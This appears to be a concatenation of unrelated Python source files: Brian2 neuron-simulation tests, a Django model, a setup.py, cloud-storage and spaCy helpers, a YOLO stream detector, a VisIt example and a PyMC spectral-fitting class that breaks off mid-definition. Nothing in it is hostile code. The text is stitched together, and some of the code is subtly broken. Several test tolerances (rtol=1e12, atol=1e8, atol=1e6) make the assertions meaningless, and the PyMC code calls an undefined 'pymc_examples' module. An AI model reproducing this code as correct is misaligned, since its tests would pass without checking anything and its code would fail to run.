squared_diff_x = (data_x[:, 1] * volt - mon[999].v)**2 rel_RMS_0 = sqrt(mean(squared_diff_0))/scale_0 rel_RMS_x = sqrt(mean(squared_diff_x))/scale_x max_rel_0 = sqrt(max(squared_diff_0))/scale_0 max_rel_x = sqrt(max(squared_diff_x))/scale_x # RMS error should be < 0.1%, maximum error along the curve should be < 0.5% # Note that this is much stricter than the original Rallpack evaluation, but # with the 1us time step, the voltage traces are extremely similar assert 100*rel_RMS_0 < 0.1 assert 100*rel_RMS_x < 0.1 assert 100*max_rel_0 < 0.5 assert 100*max_rel_x < 0.5 @pytest.mark.standalone_compatible def test_rall(): ''' Test simulation of a cylinder plus two branches, with diameters according to Rall's formula ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') BrianLogger.suppress_name('resolution_conflict') defaultclock.dt = 0.01*ms # Passive channels gL=1e-4*siemens/cm**2 EL=-70*mV # Morphology diameter = 1*um length = 300*um Cm = 1 * uF / cm ** 2 Ri = 150 * ohm * cm N = 500 rm = 1/(gL * pi * diameter) # membrane resistance per unit length ra = (4 * Ri)/(pi * diameter**2) # axial resistance per unit length la = sqrt(rm/ra) # space length morpho=Cylinder(diameter=diameter,length=length,n=N) d1 = 0.5*um L1 = 200*um rm = 1/(gL * pi * d1) # membrane resistance per unit length ra = (4 * Ri)/(pi * d1**2) # axial resistance per unit length l1 = sqrt(rm/ra) # space length morpho.L=Cylinder(diameter=d1,length=L1,n=N) d2 = (diameter**1.5-d1**1.5)**(1./1.5) rm = 1/(gL * pi * d2) # membrane resistance per unit length ra = (4 * Ri)/(pi * d2**2) # axial resistance per unit length l2 = sqrt(rm/ra) # space length L2 = (L1/l1)*l2 morpho.R=Cylinder(diameter=d2,length=L2,n=N) eqs=''' Im=gL*(EL-v) : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) neuron.v = EL neuron.I[0]=0.02*nA # injecting at the left end run(100*ms) # Check space constant calculation assert_allclose(la, neuron.space_constant[0]) assert_allclose(l1, neuron.L.space_constant[0]) assert_allclose(l2, neuron.R.space_constant[0]) # Theory x = neuron.main.distance ra = la*4*Ri/(pi*diameter**2) l = length/la + L1/l1 theory = EL+ra*neuron.I[0]*cosh(l-x/la)/sinh(l) v = neuron.main.v assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) x = neuron.L.distance theory = EL+ra*neuron.I[0]*cosh(l-neuron.main.distance[-1]/la-(x-neuron.main.distance[-1])/l1)/sinh(l) v = neuron.L.v assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) x = neuron.R.distance theory = EL+ra*neuron.I[0]*cosh(l-neuron.main.distance[-1]/la-(x-neuron.main.distance[-1])/l2)/sinh(l) v = neuron.R.v assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) @pytest.mark.standalone_compatible def test_basic_diffusion(): # A very basic test that shows that propagation is working in a very basic # sense, testing all morphological classes defaultclock.dt = 0.01*ms EL = -70*mV gL = 1e-4*siemens/cm**2 target = -10*mV eqs = ''' Im = gL*(EL-v) + gClamp*(target-v): amp/meter**2 gClamp : siemens/meter**2 ''' morph = Soma(diameter=30*um) morph.axon = Cylinder(n=10, diameter=10*um, length=100*um) morph.dend = Section(n=10, diameter=[10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0.1]*um, length=np.ones(10)*10*um) neuron = SpatialNeuron(morph, eqs) neuron.v = EL neuron.axon.gClamp[0] = 100*siemens/cm**2 mon = StateMonitor(neuron, 'v', record=True) run(0.25*ms) assert all(abs(mon.v[:, -1]/mV + 10) < 0.25), mon.v[:, -1]/mV @pytest.mark.codegen_independent def test_allowed_integration(): morph = Soma(diameter=30 * um) EL = -70 * mV gL = 1e-4 * siemens / cm ** 2 ENa = 115 * mV gNa = 120 * msiemens / cm ** 2 VT = -50.4 * mV DeltaT = 2 * mV ENMDA = 0. * mV @check_units(voltage=volt, result=volt) def user_fun(voltage): return voltage # could be an arbitrary function and is therefore unsafe allowed_eqs = ['Im = gL*(EL-v) : amp/meter**2', '''Im = gl * (El-v) + gNa * m**3 * h * (ENa-v) : amp/meter**2 dm/dt = alpham * (1-m) - betam * m : 1 dh/dt = alphah * (1-h) - betah * h : 1 alpham = (0.1/mV) * (-v+25*mV) / (exp((-v+25*mV) / (10*mV)) - 1)/ms : Hz betam = 4 * exp(-v/(18*mV))/ms : Hz alphah = 0.07 * exp(-v/(20*mV))/ms : Hz betah = 1/(exp((-v+30*mV) / (10*mV)) + 1)/ms : Hz''', '''Im = gl * (El-v) : amp/meter**2 I_ext = 1*nA + sin(2*pi*100*Hz*t)*nA : amp (point current)''', '''Im = I_leak + I_spike : amp/meter**2 I_leak = gL*(EL - v) : amp/meter**2 I_spike = gL*DeltaT*exp((v - VT)/DeltaT): amp/meter**2 (constant over dt) ''', ''' Im = gL*(EL-v) : amp/meter**2 I_NMDA = gNMDA*(ENMDA-v)*Mgblock : amp (point current) gNMDA : siemens Mgblock = 1./(1. + exp(-0.062*v/mV)/3.57) : 1 (constant over dt) ''', 'Im = gL*(EL - v) + gL*DeltaT*exp((v - VT)/DeltaT) : amp/meter**2', '''Im = I_leak + I_spike : amp/meter**2 I_leak = gL*(EL - v) : amp/meter**2 I_spike = gL*DeltaT*exp((v - VT)/DeltaT): amp/meter**2 ''', ''' Im = gL*(EL-v) : amp/meter**2 I_NMDA = gNMDA*(ENMDA-v)*Mgblock : amp (point current) gNMDA : siemens Mgblock = 1./(1. + exp(-0.062*v/mV)/3.57) : 1 ''', ] forbidden_eqs = [ '''Im = gl * (El-v + user_fun(v)) : amp/meter**2''', '''Im = gl * clip(El-v, -100*mV, 100*mV) : amp/meter**2''', ] for eqs in allowed_eqs: # Should not raise an error neuron = SpatialNeuron(morph, eqs) for eqs in forbidden_eqs: # Should raise an error with pytest.raises(TypeError): SpatialNeuron(morph, eqs) @pytest.mark.codegen_independent def test_spatialneuron_indexing(): sec = Cylinder(length=50*um, diameter=10*um, n=1) sec.sec1 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec11 = Cylinder(length=50 * um, diameter=10 * um, n=4) sec.sec1.sec12 = Cylinder(length=50 * um, diameter=10 * um, n=8) sec.sec2 = Cylinder(length=50 * um, diameter=10 * um, n=16) sec.sec2.sec21 = Cylinder(length=50 * um, diameter=10 * um, n=32) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') # Accessing indices/variables of a subtree refers to the full subtree assert len(neuron.indices[:]) == 1 + 2 + 4 + 8 + 16 + 32 assert len(neuron.sec1.indices[:]) == 2 + 4 + 8 assert len(neuron.sec1.sec11.indices[:]) == 4 assert len(neuron.sec1.sec12.indices[:]) == 8 assert len(neuron.sec2.indices[:]) == 16 + 32 assert len(neuron.sec2.sec21.indices[:]) == 32 assert len(neuron.v[:]) == 1 + 2 + 4 + 8 + 16 + 32 assert len(neuron.sec1.v[:]) == 2 + 4 + 8 assert len(neuron.sec1.sec11.v[:]) == 4 assert len(neuron.sec1.sec12.v[:]) == 8 assert len(neuron.sec2.v[:]) == 16 + 32 assert len(neuron.sec2.sec21.v[:]) == 32 # Accessing indices/variables with ".main" only refers to the section assert len(neuron.main.indices[:]) == 1 assert len(neuron.sec1.main.indices[:]) == 2 assert len(neuron.sec1.sec11.main.indices[:]) == 4 assert len(neuron.sec1.sec12.main.indices[:]) == 8 assert len(neuron.sec2.main.indices[:]) == 16 assert len(neuron.sec2.sec21.main.indices[:]) == 32 assert len(neuron.main.v[:]) == 1 assert len(neuron.sec1.main.v[:]) == 2 assert len(neuron.sec1.sec11.main.v[:]) == 4 assert len(neuron.sec1.sec12.main.v[:]) == 8 assert len(neuron.sec2.main.v[:]) == 16 assert len(neuron.sec2.sec21.main.v[:]) == 32 # Accessing subgroups assert len(neuron[0].indices[:]) == 1 assert len(neuron[0*um:50*um].indices[:]) == 1 assert len(neuron[0:1].indices[:]) == 1 assert len(neuron[sec.sec2.indices[:]]) == 16 assert len(neuron[sec.sec2]) == 16 @pytest.mark.codegen_independent def test_tree_index_consistency(): # Test all possible trees with depth 3 and a maximum of 3 branches subtree # (a total of 84 trees) # This tests whether the indices (i.e. where the compartments are placed in # the overall flattened 1D structure) make sense: for the `SpatialSubgroup` # mechanism to work correctly, each subtree has to have contiguous indices. # Separate subtrees should of course have non-overlapping indices. for tree_description in itertools.product([1, 2, 3], # children of root [0, 1, 2, 3], # children of first branch [0, 1, 2, 3], # children of second branch [0, 1, 2, 3] # children of third branch ): sec = Cylinder(length=50 * um, diameter=10 * um, n=1) root_children = tree_description[0] if not all([tree_description[x] == 0 for x in range(root_children + 1, 4)]): # skip redundant descriptions (differing number of branches in a # subtree that does not exist) continue # Create a tree according to the description for idx in range(root_children): setattr(sec, 'sec%d' % (idx + 1), Cylinder(length=50*um, diameter=10*um, n=2*(idx + 1))) for child in range(root_children): subsec = getattr(sec, 'sec%d' % (child + 1)) subsec_children = tree_description[child + 1] for idx in range(subsec_children): setattr(subsec, 'sec%d%d' % (child + 1, idx + 1), Cylinder(length=50 * um, diameter=10 * um, n=1 + (child + 1) * idx)) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') # Check the indicies for the full neuron: assert_equal(neuron.indices[:], np.arange(sec.total_compartments)) all_subsec_indices = [] for child in range(root_children): subsec = getattr(neuron, 'sec%d' % (child + 1)) sub_indices = set(subsec.main.indices[:]) subsec_children = tree_description[child + 1] for idx in range(subsec_children): subsubsec = getattr(subsec, 'sec%d%d' % (child + 1, idx + 1)) sub_indices |= set(subsubsec.main.indices[:]) # The indices for a full subtree should be the union of the indices # for all subsections within that subtree assert sub_indices == set(subsec.indices[:]) all_subsec_indices.extend(subsec.indices[:]) # Separate subtrees should not overlap assert len(all_subsec_indices) == len(set(all_subsec_indices)) @pytest.mark.codegen_independent def test_spatialneuron_subtree_assignment(): sec = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec11 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec12 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2.sec21 = Cylinder(length=50 * um, diameter=10 * um, n=2) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') neuron.v = 1*volt assert_allclose(neuron.v[:], np.ones(12)*volt) neuron.sec1.v += 1*volt assert_allclose(neuron.main.v[:], np.ones(2)*volt) assert_allclose(neuron.sec1.v[:], np.ones(6)*2*volt) assert_allclose(neuron.sec1.main.v[:], np.ones(2)*2*volt) assert_allclose(neuron.sec1.sec11.v[:], np.ones(2)*2*volt) assert_allclose(neuron.sec1.sec12.v[:], np.ones(2)*2*volt) assert_allclose(neuron.sec2.v[:], np.ones(4)*volt) neuron.sec2.v = 5*volt assert_allclose(neuron.sec2.v[:], np.ones(4)*5*volt) assert_allclose(neuron.sec2.main.v[:], np.ones(2)*5*volt) assert_allclose(neuron.sec2.sec21.v[:], np.ones(2)*5*volt) @pytest.mark.codegen_independent def test_spatialneuron_morphology_assignment(): sec = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec11 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec12 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2.sec21 = Cylinder(length=50 * um, diameter=10 * um, n=2) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') neuron.v[sec.sec1.sec11] = 1*volt assert_allclose(neuron.sec1.sec11.v[:], np.ones(2)*volt) assert_allclose(neuron.sec1.sec12.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec1.main.v[:], np.zeros(2)*volt) assert_allclose(neuron.main.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec2.v[:], np.zeros(4)*volt) neuron.v[sec.sec2[25*um:]] = 2*volt neuron.v[sec.sec1[:25*um]] = 3 * volt assert_allclose(neuron.main.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec2.main.v[:], [0, 2]*volt) assert_allclose(neuron.sec2.sec21.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec1.main.v[:], [3, 0]*volt) assert_allclose(neuron.sec1.sec11.v[:], np.ones(2)*volt) assert_allclose(neuron.sec1.sec12.v[:], np.zeros(2)*volt) @pytest.mark.standalone_compatible @pytest.mark.multiple_runs def test_spatialneuron_capacitive_currents(): if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 0.1*ms morpho = Cylinder(x=[0, 10]*cm, diameter=2*238*um, n=200, type='axon') El = 10.613* mV ENa = 115*mV EK = -12*mV gl = 0.3*msiemens/cm**2 gNa0 = 120*msiemens/cm**2 gK = 36*msiemens/cm**2 # Typical equations eqs = ''' # The same equations for the whole neuron, but possibly different parameter values # distributed transmembrane current Im = gl * (El-v) + gNa * m**3 * h * (ENa-v) + gK * n**4 * (EK-v) : amp/meter**2 I : amp (point current) # applied current dm/dt = alpham * (1-m) - betam * m : 1 dn/dt = alphan * (1-n) - betan * n : 1 dh/dt = alphah * (1-h) - betah * h : 1 alpham = (0.1/mV) * (-v+25*mV) / (exp((-v+25*mV) / (10*mV)) - 1)/ms : Hz betam = 4 * exp(-v/(18*mV))/ms : Hz alphah = 0.07 * exp(-v/(20*mV))/ms : Hz betah = 1/(exp((-v+30*mV) / (10*mV)) + 1)/ms : Hz alphan = (0.01/mV) * (-v+10*mV) / (exp((-v+10*mV) / (10*mV)) - 1)/ms : Hz betan = 0.125*exp(-v/(80*mV))/ms : Hz gNa : siemens/meter**2 ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=35.4*ohm*cm, method="exponential_euler") mon = StateMonitor(neuron, ['Im', 'Ic'], record=True, when='end') run(10*ms) neuron.I[0] = 1*uA # current injection at one end run(3*ms) neuron.I = 0*amp run(10*ms) device.build(direct_call=False, **device.build_options) assert_allclose((mon.Im-mon.Ic).sum(axis=0)/(mA/cm**2), np.zeros(230), atol=1e6) if __name__ == '__main__': test_custom_events() test_construction() test_construction_coordinates() test_infinitecable() test_finitecable() test_rallpack1() test_rallpack2() test_rallpack3() test_rall() test_basic_diffusion() test_allowed_integration() test_spatialneuron_indexing() test_tree_index_consistency() test_spatialneuron_subtree_assignment() test_spatialneuron_morphology_assignment() test_spatialneuron_capacitive_currents()
python
from django.db import models from django.contrib.auth.models import AbstractUser class BaseModel(models.Model): """ A base abstract model from which all other models will inherit. """ created = models.DateTimeField( auto_now_add=True, blank=True, null=True, help_text='Record first created date and time.' ) modified = models.DateTimeField( auto_now=True, blank=True, null=True, help_text='Record last modified date and time.' ) class Meta: abstract = True class CustomUser(AbstractUser): """ A custom user model for the built in Auth system """ pass
python
from __future__ import absolute_import import pkg_resources import setuptools import setuptools.command.build_ext import setuptools.command.test __author__ = 'Shashank Shekhar' __version__ = '0.14' __email__ = '[email protected]' __download_url__ = 'https://github.com/shkr/routesimilarity/archive/0.1.tar.gz' try: import Cython.Build __cython = True except ImportError: __cython = False class BuildExtension(setuptools.command.build_ext.build_ext): def build_extensions(self): numpy_includes = pkg_resources.resource_filename("numpy", "core/include") for extension in self.extensions: if not hasattr(extension, "include_dirs") or \ (hasattr(extension, "include_dirs") and numpy_includes not in extension.include_dirs): extension.include_dirs.append(numpy_includes) setuptools.command.build_ext.build_ext.build_extensions(self) __extensions = [ setuptools.Extension( name="routesimilarity.directed_hausdorff", sources=[ "routesimilarity/directed_hausdorff.{}".format("pyx" if __cython else "c") ], extra_compile_args = ["-O3", "-ffast-math", "-march=native"] ) ] if __cython: __extensions = Cython.Build.cythonize(__extensions) with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name='routesimilarity', packages=['routesimilarity'], version=__version__, license='MIT', description='Methods for similarity scoring between routes', long_description=long_description, long_description_content_type="text/markdown", author=__author__, author_email=__email__, url='https://github.com/shkr/routesimilarity', download_url=__download_url__, keywords=['route', 'similarity', 'hausdorff'], install_requires=[ 'geopy', 'numpy>=1.15' ], setup_requires=[ 'cython>=0.28', 'numpy>=1.15' ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'Programming Language :: Python :: 3' ], ext_modules=__extensions, cmdclass={"build_ext": BuildExtension} )
python
import json import os from itertools import groupby from pathlib import Path from typing import List, Union from google.cloud import storage def load_config(train_or_apply: str) -> dict: """Load config""" config_file_path = Path(__file__).parent.resolve() / "config.json" with open(config_file_path, "r") as f: config = json.load(f) return config[train_or_apply] def doc_to_spans(doc): """This function converts spaCy docs to the list of named entity spans in Label Studio compatible JSON format""" tokens = [(tok.text, tok.idx, tok.ent_type_) for tok in doc] results = [] entities = set() for entity, group in groupby(tokens, key=lambda t: t[-1]): if not entity: continue group = list(group) _, start, _ = group[0] word, last, _ = group[-1] text = " ".join(item[0] for item in group) end = last + len(word) results.append( { "from_name": "label", "to_name": "text", "type": "labels", "value": {"start": start, "end": end, "text": text, "labels": [entity]}, } ) entities.add(entity) return results, entities def load_train_data(train_data_files: str) -> List: """Load jsonl train data as a list, ready to be ingested by spacy model. Args: train_data_local_path (str): Path of files to load. Returns: List: Tuple of texts and dict of entities to be used for training. """ train_data = [] for data_file in train_data_files: with open(data_file, "r") as f: for json_str in list(f): train_data_dict = json.loads(json_str) train_text = train_data_dict["text"] train_entities = { "entities": [ tuple(entity_elt) for entity_elt in train_data_dict["entities"] ] } formatted_train_line = (train_text, train_entities) train_data.append(formatted_train_line) return train_data def download_from_gcs( bucket_name: str, source_blob_name: str, destination_folder: str, explicit_filepath: bool = False, ) -> Union[str, List[str]]: """Download gcs data locally. Args: bucket_name (str): Name of the GCS bucket. source_blob_name (str): GCS path to data in the bucket. destination_folder (str): Folder to download GCS data to. explicit_filepath (bool, optional): Decides whether to return explicit list of filepath instead \ of destination folder only. Default to False. Returns: str: Local destination folder """ storage_client = storage.Client() bucket = storage_client.bucket(bucket_name) blobs = bucket.list_blobs(prefix=source_blob_name) filepath_list = [] for blob in blobs: if not blob.name.endswith("/"): filename = blob.name.replace("/", "_") local_path = os.path.join(destination_folder, filename) blob.download_to_filename(local_path) filepath_list.append(local_path) print(f"Downloaded at {destination_folder}") if explicit_filepath: return filepath_list return destination_folder def download_bytes_from_gcs(bucket_name, source_blob_name): storage_client = storage.Client() bucket = storage_client.bucket(bucket_name) blob = bucket.blob(source_blob_name) return blob.download_as_string() def upload_to_gcs(bucket_name, source_blob_name, data, content_type=None): storage_client = storage.Client() bucket = storage_client.bucket(bucket_name) blob = bucket.blob(source_blob_name) blob.upload_from_string(data, content_type=content_type)
python
# Adapted from repo botwizer by DevGltich # https://github.com/DevGlitch/botwizer # Resources used: # https://github.com/AlexeyAB/darknet # https://www.youtube.com/watch?v=Z_uPIUbGCkA import cv2 import numpy as np from time import sleep def stream_object_detection_text(rtsp_url, config_path, weights_path, labels_path): """Running YOLO on a streaming feed to detect objects :param rtsp_url: RTSP URL of stream to analyse :param config_path: path of the .cfg file :param weights_path: path of the .weights file :param labels_path: path of the .names file :return: video with bounding box and label of object(s) detected :rtype: OpenCV window """ # INFO print("[INFO] Initializing...") sleep(1) # Reads and load model stored in Darknet model files net = cv2.dnn.readNetFromDarknet(config_path, weights_path) print("[INFO] Model loaded.") sleep(1) # Object Labels obj_names = open(labels_path) obj_labels = obj_names.read().strip().split("\n") print("[INFO] Object labels loaded.") sleep(1) # Reads stream RTSP URL print("[INFO] Stream Capture Starting...") stream_video = cv2.VideoCapture(rtsp_url) print("[INFO] Stream Capture Started.") # FPS # fps = stream_video.get(cv2.CAP_PROP_FPS) # print(f"[INFO] FPS = {fps}") _, image = stream_video.read() # INFO print("[INFO] Starting Object Detection Analysis...") while stream_video.isOpened(): # INFO # print("[INFO] Running...") _, image = stream_video.read() img_row, img_col = image.shape[:2] # Creating a 4-dimensional blob from image # SwapRB to True increase classification accuracy blob = cv2.dnn.blobFromImage( image, 1 / 255.0, (416, 416), swapRB=True, crop=False ) net.setInput(blob) # Putting blob as the input of the network net.setInput(blob) # Getting each layer name layer_name = net.getLayerNames() layer_name = [layer_name[i[0] - 1] for i in net.getUnconnectedOutLayers()] outputs = net.forward(layer_name) grid, probabilities, labels = [], [], [] # Find each single output # This for loop is based on information from darknet's code and opencv for output in outputs: # Find each single detection in output for detection in output: # Get probability score and label of the detection score = detection[5:] label = np.argmax(score) prob = score[label] # Selecting only detections that are superior to 70% probability # Anything below 70% is ignored as probability is too low # You can increase this to higher or lower probability if needed if prob > 0.7: # Working on each bounding box of the grid created by YOLO grid_box = detection[:4] * np.array( [img_col, img_row, img_col, img_row] ) (X, Y, width, height) = grid_box.astype("int") x = X - (width / 2) y = Y - (height / 2) # Appending to the lists probabilities.append(float(prob)) labels.append(label) grid.append([int(x), int(y), int(width), int(height)]) # Performs Non Maximum Suppression given boxes and corresponding scores. # This filters the boxes in the image grid. # It keeps only the ones with the highest probability NMS = cv2.dnn.NMSBoxes(grid, probabilities, 0.6, 0.6) # If at least one object has been detected if len(NMS) > 0: # List objects where it stores the obj_names labels detected in the image objects = [] # Add each object detected to the list objects for i in NMS.flatten(): objects += [f"{obj_labels[labels[i]]}"] yield objects # For debug # else: # print("nothing detected here...") # Close names file obj_names.close() # Release stream stream_video.release() # INFO # print("[INFO] Done.")
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import division import numpy as np from time import sleep from visitor import * from visitor import VisitInstrumentation, VISIT_MESHTYPE_POINT counter = 0 def dp(*args, **kwargs): x = np.linspace(-5.,4.,100) y = np.linspace(0.,10.,100) return x, y def cycle_time_provider(*args, **kwargs): return counter, counter/1e9 def step(*args, **kwargs): global counter sleep(0.2) counter += 1 def count(*arg, **kwargs): return counter def message(*arg, **kwargs): return str(counter/1e9) def number(arg, *args, **kwargs): print arg def main(): name = 'ui_example' prefix = '.' description = 'This example demonstrates the ui capabilities of libsim.' v = VisitInstrumentation(name, description, prefix=prefix, step=step, cycle_time_provider=cycle_time_provider, ui="./example.ui", ) v.register_mesh('point_mesh_2d', dp, VISIT_MESHTYPE_POINT, 2, number_of_domains=1, domain_title="Domains", domain_piece_name="domain", num_of_groups=0, xunits="cm", yunits="cm", xlabel="a", ylabel="b") v.register_ui_set_int("progress", count) v.register_ui_set_string("text", message) v.register_ui_value("spin", number, None) v.register_ui_value("dial", number, None) v.run() if __name__ == '__main__': main()
python
from os import environ environ["MKL_THREADING_LAYER"] = "GNU" import pymc3 import pymc as pymc2 import cPickle as pickle import theano import theano.tensor as tt import numpy as np from collections import OrderedDict from time import sleep from numpy import mean, std, square, percentile, median, sum as np_sum, array, ones, empty from lib.specSynthesizer_tools import ModelIngredients from lib.Astro_Libraries.spectrum_fitting.gasEmission_functions import TOIII_TSIII_relation from lib.Astro_Libraries.spectrum_fitting.import_functions import parseObjData # Line to avoid the compute_test_value error theano.config.compute_test_value = 'ignore' # Illustrate the new def displaySimulationData(model, priorsDict, lineLabels, lineFluxes, lineErr, lineFitErr): print('\n- Simulation configuration') # Print input lines and fluxes print('\n-- Input lines') for i in range(lineLabels.size): warnLine = '{}'.format('|| WARNING obsLineErr = {:.4f}'.format(lineErr[i]) if lineErr[i] != lineFitErr[i] else '') displayText = '{} flux = {:.4f} +/- {:.4f} || err % = {:.5f} {}'.format(lineLabels[i], lineFluxes[i], lineFitErr[i], lineFitErr[i] / lineFluxes[i], warnLine) print(displayText) # Present the model data print('\n-- Priors design:') for prior in priorsDict: displayText = '{} : mu = {}, std = {}'.format(prior, priorsDict[prior][0], priorsDict[prior][1]) print(displayText) # Check test_values are finite print('\n-- Test points:') model_var = model.test_point for var in model_var: displayText = '{} = {}'.format(var, model_var[var]) print(displayText) # Checks log probability of random variables print('\n-- Log probability variable:') print(model.check_test_point()) # Wait a bit before starting the simulation sleep(0.5) return class SpectraSynthesizer(ModelIngredients): def __init__(self): ModelIngredients.__init__(self) # Priors conf self.modelParams = ['n_e', 'T_low', 'T_high', 'cHbeta', 'Ar3', 'Ar4', 'N2', 'O2', 'O3', 'S2', 'S3', 'tau', 'He1r', 'He2r'] self.defaultPriosConf = {} # Normalization constants for the plots # TODO this should go together with the reparamatrization self.normContants = {'He1r': 0.1, 'He2r': 0.001} # Dictionary with the models self.modelDict = dict(nuts=self.nuts_TwoTemps, HMC=self.emissionHMC, stelar_prefit=self.stellarContinua_model) def fitSpectra(self, model_name, hammer='HMC', iterations=8000, tuning=2000, priors_conf=None, include_reddening=True, include_Thigh_prior=True): # Declare the priors configuration self.priorsConf = self.defaultPriosConf.copy() if priors_conf is not None: self.priorsConf.update(priors_conf) # Run the sampler # TODO need to decide where to place this db_address = self.output_folder + model_name + '.db' # TODO Deberiamos poder quitar este .db self.run_pymc(hammer, db_address, iterations, tuning, include_reddening=include_reddening, include_Thigh_prior=include_Thigh_prior) # Load the results interenceParamsDict = self.load_pymc_database_manual(db_address, sampler='pymc3') # Compute elemental abundances from the traces self.elementalChemicalModel(interenceParamsDict, self.obsAtoms, iterations * 2) # Save parameters into the object log #TODO make a new mechanism to delete the results region store_params = OrderedDict() for parameter in interenceParamsDict.keys(): if ('_log__' not in parameter) and ('interval' not in parameter) and ('_op' not in parameter): trace = interenceParamsDict[parameter] store_params[parameter] = np.array([trace.mean(), trace.std()]) parseObjData(self.configFile, self.objName + '_results', store_params) # Plot output data self.plotOuputData(self.output_folder + model_name, interenceParamsDict, self.modelParams) return def run_pymc(self, model, db_address, iterations=10000, tuning=0, prefit=True, include_reddening=True, include_Thigh_prior=True): #TODO this part is very dirty it is not clear where it goes if 'HMC' not in model: variables_list = self.priorsConf.keys() # Define MCMC model MAP_Model = pymc2.MAP(self.modelDict[model]) # Prefit: if prefit is not False: fit_method = prefit if prefit is str else 'fmin_powell' MAP_Model.fit(method = fit_method) # Print prefit data self.display_run_data(MAP_Model, variables_list) # Launch sample self.pymc2_M = pymc2.MCMC(MAP_Model.variables, db = 'pickle', dbname = db_address) self.pymc2_M.sample(iter=iterations) # Save the output csv mean data if variables_list != None: csv_address = db_address + '_Parameters' self.pymc2_M.write_csv(csv_address, variables=variables_list) #Print again the output prediction for the entire trace self.display_run_data(MAP_Model, variables_list) #Close the database self.pymc2_M.db.close() else: # Launch sample trace, model = self.modelDict[model](iterations, tuning, include_reddening, include_Thigh_prior) # Save the data with open(db_address, 'wb') as trace_pickle: pickle.dump({'model': model, 'trace': trace}, trace_pickle) def priorsConfiguration(self): # Container to store the synthetic line fluxes if self.emissionCheck: lineFlux_tt = tt.zeros(self.lineLabels.size) continuum = tt.zeros(self.obj_data['wave_resam'].size) # idx_N2_6548A = self.lineLabels == 'N2_6548A' # idx_N2_6584A = self.lineLabels == 'N2_6584A' # self.obsLineFluxErr[idx_N2_6548A], self.obsLineFluxErr[idx_N2_6584A] = 0.1* self.obsLineFluxes[idx_N2_6548A], 0.1 * self.obsLineFluxes[idx_N2_6584A] # Stellar bases tensor if self.stellarCheck: Xx_tt = theano.shared(self.Xx_stellar) basesFlux_tt = theano.shared(self.onBasesFluxNorm) nebular_continuum_tt = theano.shared(self.nebDefault['synth_neb_flux']) err_Continuum = 0.10 * ones(self.inputContinuum.size) # TODO really need to check this # err_Continuum = self.obsFluxNorm * 0.05 # err_Continuum[err_Continuum < 0.001] = err_Continuum.mean() return def emissionHMC(self, iterations, tuning, include_reddening=True, include_Thigh_prior=True): # Container to store the synthetic line fluxes lineFluxTTArray = tt.zeros(self.lineLabels.size) with pymc3.Model() as model: # Gas priors T_low = pymc_examples.Normal('T_low', mu=self.priorsDict['T_low'][0], sd=self.priorsDict['T_low'][1]) n_e = pymc_examples.Normal('n_e', mu=self.priorsDict['n_e'][0], sd=self.priorsDict['n_e'][1]) cHbeta = pymc_examples.Lognormal('cHbeta', mu=0, sd=1) if include_reddening else self.obj_data['cHbeta_true'] tau = pymc_examples.Lognormal('tau', mu=0, sd=0.4) if self.He1rCheck else 0.0 # High ionization region temperature if include_Thigh_prior: T_high = pymc_examples.Normal('T_high', mu=self.priorsDict['T_low'][0], sd=self.priorsDict['T_low'][1]) else: T_high = TOIII_TSIII_relation(T_low) # Composition priors abund_dict = {'H1r': 1.0} for j in self.rangeObsAtoms: if self.obsAtoms[j] == 'He1r': abund_dict[self.obsAtoms[j]] = self.normContants['He1r'] * pymc_examples.Lognormal(self.obsAtoms[j], mu=0, sd=1) elif self.obsAtoms[j] == 'He2r': abund_dict[self.obsAtoms[j]]= self.normContants['He2r'] * pymc_examples.Lognormal(self.obsAtoms[j], mu=0, sd=1) # elif self.obsAtoms[j] == 'Ar4': # abund_dict[self.obsAtoms[j]]= pymc3.Normal('Ar4', mu=4, sd=0.2) else: abund_dict[self.obsAtoms[j]] = pymc_examples.Normal(self.obsAtoms[j], mu=5, sd=5) # Compute emission line fluxes lineFluxTTArray = self.calcEmFluxes(T_low, T_high, n_e, cHbeta, tau, abund_dict, self.emFlux_ttMethods, lineFluxTTArray, True) # Store computed fluxes pymc_examples.Deterministic('calcFluxes_Op', lineFluxTTArray) # Likelihood gas components Y_emision = pymc_examples.Normal('Y_emision', mu=lineFluxTTArray, sd=self.fitLineFluxErr, observed=self.obsLineFluxes) # Display simulation data displaySimulationData(model, self.priorsDict, self.lineLabels, self.obsLineFluxes, self.obsLineFluxErr, self.fitLineFluxErr) # Launch model print('\n- Launching sampling') trace = pymc_examples.sample(iterations, tune=tuning, nchains=2, njobs=1, model=model) #trace = pymc3.sample(iterations, tune=tuning, nchains=2, njobs=2, model=model) return trace, model def 